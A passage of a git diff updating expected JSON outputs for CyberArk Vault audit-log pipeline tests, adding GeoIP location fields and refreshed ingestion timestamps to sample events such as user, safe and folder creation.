User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -497,6 +560,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -541,7 +613,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830948700Z", + "ingested": "2021-12-14T14:42:01.371006322Z", "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -568,6 +640,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -612,7 +693,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830954Z", + "ingested": "2021-12-14T14:42:01.371006655Z", "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -639,6 +720,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -683,7 +773,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830959500Z", + "ingested": "2021-12-14T14:42:01.371006990Z", "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -710,6 +800,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -754,7 +853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830964900Z", + "ingested": "2021-12-14T14:42:01.371007322Z", "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -781,6 +880,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -825,7 +933,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830970700Z", + "ingested": "2021-12-14T14:42:01.371007843Z", "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json index 42dd5c423c0..9e986e8398b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,14 +38,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "update safe", - "ingested": "2021-12-09T13:36:39.071393700Z", + "ingested": "2021-12-14T14:42:02.948918854Z", "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", "code": "181", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json index 46671324d08..cec8dd3c1ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,28 +38,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add safe", - "ingested": "2021-12-09T13:36:39.177420800Z", + "ingested": "2021-12-14T14:42:03.079824324Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -82,6 +79,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -100,14 +102,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add safe", - "ingested": "2021-12-09T13:36:39.177430400Z", + "ingested": "2021-12-14T14:42:03.079826746Z", "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json index 2d423ba5584..dc04a334c84 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -52,7 +61,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-12-09T13:36:39.355913600Z", + "ingested": "2021-12-14T14:42:03.328659568Z", "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" @@ -111,7 +120,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-12-09T13:36:39.355922200Z", + "ingested": "2021-12-14T14:42:03.328662637Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e187\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Folder\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Folder\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\\\\\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Folder\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\\\\\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json index 77fb6481866..7a6854477bd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json @@ -66,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546289100Z", + "ingested": "2021-12-14T14:42:03.559587239Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -97,10 +97,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -149,7 +158,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546293100Z", + "ingested": "2021-12-14T14:42:03.559590026Z", "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT 